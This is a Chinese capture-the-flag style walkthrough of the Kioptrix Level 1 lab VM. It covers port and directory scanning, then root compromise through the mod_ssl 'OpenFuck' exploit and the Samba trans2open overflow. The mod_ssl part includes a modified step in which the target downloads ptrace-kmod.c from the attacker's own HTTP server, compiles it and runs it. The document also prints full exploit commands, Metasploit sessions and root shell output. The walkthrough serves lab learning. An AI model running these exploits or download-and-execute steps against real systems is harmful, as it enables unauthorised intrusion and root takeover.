靶场Kioptrix Level 1攻略
【推荐学习】暗月渗透测试培训 十多年渗透经验,体系化培训渗透测试 、高效学习渗透测试,欢迎添加微信好友aptimeok 咨询。
STATEMENT
声明
由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,雷神众测及文章作者不为此承担任何责任。
雷神众测拥有对此文章的修改和解释权。如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经雷神众测允许,不得任意修改或者增减此文章内容,不得以任何方式将其用于商业目的。
做题步骤
1.先扫描网段找出靶机ip
nmap 扫描网段 nmap -sP xxxxxx/24
2.一般都是web服务 可以通过nmap发现开启的web服务
nmap 全扫描 -sS -sV -A -p- xxxxxx
3.使用目录遍历工具进行扫描
dirb dirsearch gobuster
dirb http://xxxxxxx -X .php,.txt,.zip,.html
python3 dirsearch.py -u http://xxxxxxx -e .php,.txt,.zip,.html
gobuster dir -u http://xxxxxxx -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.txt,.html,.zip
通过三个工具进行扫描发现了几个目录,扫描的时候三个工具都可以试下
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[//192.168.52.135 ] Url: http:
[ ] Method: GET
[10 ] Threads:
[-2.3-medium.txt ] Wordlist: /usr/share/wordlists/dirbuster/directory-list
[404 ] Negative Status codes:
[3.1.0 ] User Agent: gobuster/
[ ] Extensions: html,zip,php,txt
[10s ] Timeout:
===============================================================
2022/01/06 02:34:06 Starting gobuster in directory enumeration mode
===============================================================
/index.html (Status: 200) [Size: 2890]
/test.php (Status: 200) [Size: 27]
/manual (Status: 301) [Size: 294] [--> http://127.0.0.1/manual/]
/usage (Status: 301) [Size: 293] [--> http://127.0.0.1/usage/]
/mrtg (Status: 301) [Size: 292] [--> http://127.0.0.1/mrtg/]
===============================================================
2022/01/06 02:39:27 Finished
===============================================================
发现5个路径,index.html为默认页面

test.php的页面为

/manual路径,看到Mod_ssl版本是2.8

/usage/路径看到Webalizer Version 2.01

使用rustscan或者nikto扫描端口服务和端口暴露面
使用rustscan扫描rustscan -u5000 -a192.168.52.135 — -sC -sV -oA scan.log
可以看到80服务为apache服务,并且开启了111端口rpcbind服务,并且还有mod_ssl服务,apache服务的版本号为1.3.20
80/tcp open http syn-ack ttl 64 Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 Ope
nSSL/0.9.6b)
|_http-server-header: Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-title: Test Page for the Apache Web Server on Red Hat Linux
| http-methods:
| Supported Methods: GET HEAD OPTIONS TRACE
|_ Potentially risky methods: TRACE
111/tcp open rpcbind syn-ack ttl 64 2 (RPC # 100000)
| rpcinfo:
| program version port/proto service
| 100000 2 111/tcp rpcbind
| 100000 2 111/udp rpcbind
| 100024 1 1024/tcp status
|_ 100024 1 1024/udp status
139/tcp open netbios-ssn syn-ack ttl 64 Samba smbd (workgroup: MYGROUP)
443/tcp open ssl/https syn-ack ttl 64 Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.
9.6b
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceN
ame=SomeState/countryName=--/localityName=SomeCity/organizationalUnitName=SomeOrganizationalUnit/emailAd
dress=root@localhost.localdomain
| Issuer: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeSta
te/countryName=--/localityName=SomeCity/organizationalUnitName=SomeOrganizationalUnit/emailAddress=root@
localhost.localdomain
使用nikto扫描nikto -host xxxxx
发现nikto扫描出现了apache服务中存在mod_ssl模块,版本为2.8.4,并且指出这个版本存在远程缓冲区溢出漏洞利用
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.52.135
+ Target Hostname: 192.168.52.135
+ Target Port: 80
+ Start Time: 2022-01-07 01:41:41 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
+ Server may leak inodes via ETags, header found with file /, inode: 34821, size: 2890, mtime: Wed Sep
5 23:12:46 2001
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against
some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of
the site in a different fashion to the MIME type
+ Apache/1.3.20 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for
the 2.x branch.
+ OpenSSL/0.9.6b appears to be outdated (current is at least 1.1.1). OpenSSL 1.0.0o and 0.9.8zc are also
current.
+ mod_ssl/2.8.4 appears to be outdated (current is at least 2.8.31) (may depend on server version)
+ OSVDB-27487: Apache is vulnerable to XSS via the Expect header
+ Allowed HTTP Methods: GET, HEAD, OPTIONS, TRACE
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-838: Apache/1.3.20 - Apache 1.x up 1.2.34 are vulnerable to a remote DoS and possible code execu
tion. CAN-2002-0392.
+ OSVDB-4552: Apache/1.3.20 - Apache 1.3 below 1.3.27 are vulnerable to a local buffer overflow which al
lows attackers to kill any process on the system. CAN-2002-0839.
+ OSVDB-2733: Apache/1.3.20 - Apache 1.3 below 1.3.29 are vulnerable to overflows in mod_rewrite and mod
_cgi. CAN-2003-0542.
+ mod_ssl/2.8.4 - mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a r
emote shell. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0082, OSVDB-756.
+ ///etc/hosts: The server install allows reading of any system file by adding an extra '/' to the URL.
+ OSVDB-682: /usage/: Webalizer may be installed. Versions lower than 2.01-09 vulnerable to Cross Site S
mod_ssl远程缓冲区执行漏洞
尝试搜索利用脚本searchsploit mod_ssl,发现2.8.7版本存在多个远程溢出漏洞,尝试利用

尝试利用该漏洞,选择47080.c这个脚本文件进行利用
head看下利用方法,直接gcc编译之后进行利用,gcc -o OpenFuck OpenFuck.c -lcrypto
/*
* OF version r00t VERY PRIV8 spabam
* Version: v3.0.4
* Requirements: libssl-dev ( apt-get install libssl-dev )
* Compile with: gcc -o OpenFuck OpenFuck.c -lcrypto
* objdump -R /usr/sbin/httpd|grep free to get more targets
* # hackarena irc.brasnet.org
* Note: if required, host ptrace and replace wget target
*/
但是首先得改脚本,因为脚本利用过程中会出现下载利用脚本的情况,原脚本中的网址下载过程中间出现问题所以要把脚本下载下来然后本地起个服务器python -m http.server(脚本下载地址https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c),然后把47080.c脚本中的网址改掉,改成服务器的地址http://192.168.52.137:8000/ptrace-kmod.c然后再重新编译,gcc -o OpenFuck 47080.c -lcrypto
ptrace-kmod.c -B /usr/bin; rm ptrace-kmod.c; ./exploit; n"
然后本地启动http服务
% python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
然后运行编译好之后的二进制可执行文件,会有很多系统类型,选择合适的系统类型
0x6a - RedHat Linux 7.2 (apache-1.3.20-16)1
0x6b - RedHat Linux 7.2 (apache-1.3.20-16)2
编译执行,40这个值可以慢慢加如果40达不到成功提权的效果。
./OpenFuck 0x6b 192.168.52.135 -c 40
提权成功,成功拿到了shell并且是root权限
% ./OpenFuck 0x6b 192.168.52.135 -c 40
*******************************************************************
* OpenFuck v3.0.4-root priv8 by SPABAM based on openssl-too-open *
*******************************************************************
* by SPABAM with code of Spabam - LSD-pl - SolarEclipse - CORE *
* # hackarena irc.brasnet.org *
* TNX Xanthic USG # SilverLords # BloodBR # isotk # highsecure # uname *
* # ION # delirium # nitr0x # coder # root # endiabrad0s # NHC # TechTeam *
* # pinchadoresweb HiTechHate DigitalWrapperz P()W GAT ButtP!rateZ *
*******************************************************************
Connection... 40 of 40
Establishing SSL connection
cipher: 0x4043808c ciphers: 0x80f8050
Ready to send shellcode
Spawning shell...
bash: no job control in this shell
bash-2.05$
c; gcc -o exploit ptrace-kmod.c -B /usr/bin; rm ptrace-kmod.c; ./exploit; -kmod.
--22:56:58-- http://192.168.52.137:8000/ptrace-kmod.c
=> `ptrace-kmod.c'
Connecting to 192.168.52.137:8000... connected!
HTTP request sent, awaiting response... 200 OK
Length: 3,921 [text/x-csrc]
0K ... 100% @ 3.74 MB/s
22:56:58 (3.74 MB/s) - `ptrace-kmod.c' saved [3921/3921]
gcc: file path prefix `/usr/bin' never used
[+] Attached to 1368
[+] Waiting for signal
[+] Signal caught
[+] Shellcode placed at 0x4001189d
[+] Now wait for suid shell...
id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
samba远程代码执行漏洞
通过rustscan或者nmap扫描出来的发现存在samba服务,使用msf扫描samba版本号,发现是samba2.2.1a版本的
msf6 > use auxiliary/scanner/smb/smb_version
msf6 auxiliary(scanner/smb/smb_version) > options
Module options (auxiliary/scanner/smb/smb_version):
Name Current Setting Required Description
--------------- -------- -----------
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-fr
amework/wiki/Using-Metasploit
THREADS 1 yes The number of concurrent threads (max one per host)
msf6 auxiliary(scanner/smb/smb_version) > set rhosts 192.168.52.135
rhosts => 192.168.52.135
msf6 auxiliary(scanner/smb/smb_version) >
msf6 auxiliary(scanner/smb/smb_version) > run
192.168.52.135:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional)
192.168.52.135:139 - Host could not be identified: Unix (Samba 2.2.1a)
192.168.52.135: - Scanned 1 of 1 hosts (100% complete)
Auxiliary module execution completed
searchsploit samba 2.2.1a发现了一个远程代码执行漏洞可以利用
# searchsploit samba 2.2.1a
---------------------------------
Exploit Title | Path
---------------------------------
Samba 2.2.0 < 2.2.8 (OSX) - trans2open Overflow (Metasploit) | osx/remote/9924.rb
Samba < 2.2.8 (Linux/BSD) - Remote Code Execution | multiple/remote/10.c
Samba < 3.0.20 - Remote Heap Overflow | linux/remote/7701.txt
Samba < 3.6.2 (x86) - Denial of Service (PoC) | linux_x86/dos/36741.py
---------------------------------
head查看exp
/*
Remote root exploit for Samba 2.2.x and prior that works against
Linux (all distributions), FreeBSD (4.x, 5.x), NetBSD (1.x) and
OpenBSD (2.x, 3.x and 3.2 non-executable stack).
sambal.c is able to identify samba boxes. It will send a netbios
name packet to port 137. If the box responds with the mac address
00-00-00-00-00-00, it's probally running samba.
[esdee@embrace esdee]$ ./sambal -d 0 -C 60 -S 192.168.0
samba-2.2.8 < remote root exploit by eSDee (www.netric.org|be)
--------------------------------------------------------------
编译成可执行文件然后执行。
gcc -g -o samba2root 10.c
然后执行exp,拿到权限
./samba2root -d 0 -C 60 -S 192.168.93.134
第二种利用方法,使用msf进行渗透
use exploit/linux/samba/trans2open
msf6 exploit(linux/samba/trans2open) > set payload linux/x86/shell/bind_tcp
payload => linux/x86/shell_bind_tcp
msf6 exploit(linux/samba/trans2open) >set rhosts 192.168.93.134
msf6 exploit(linux/samba/trans2open) > run
[*] 192.168.93.134:139 - Trying return address 0xbffffdfc...
[*] Started bind TCP handler against 192.168.93.134:4444
[*] 192.168.93.134:139 - Trying return address 0xbffffcfc...
[*] 192.168.93.134:139 - Trying return address 0xbffffbfc...
[*] 192.168.93.134:139 - Trying return address 0xbffffafc...
[*] Sending stage (36 bytes) to 192.168.93.134
[*] 192.168.93.134:139 - Trying return address 0xbffff9fc...
[*] 192.168.93.134:139 - Trying return address 0xbffff8fc...
[*] 192.168.93.134:139 - Trying return address 0xbffff7fc...
[*] 192.168.93.134:139 - Trying return address 0xbffff6fc...
[*] 192.168.93.134:139 - Trying return address 0xbffff5fc...
[*] Command shell session 2 opened (192.168.93.129:34145 -> 192.168.93.134:4444 ) at 2022-02-26 12:45:53 +0800
id
uid=0(root) gid=0(root) groups=99(nobody)
来 源雷神众测
原创文章,作者:mOon,如若转载,请注明出处:https://www.moonsec.com/3866.html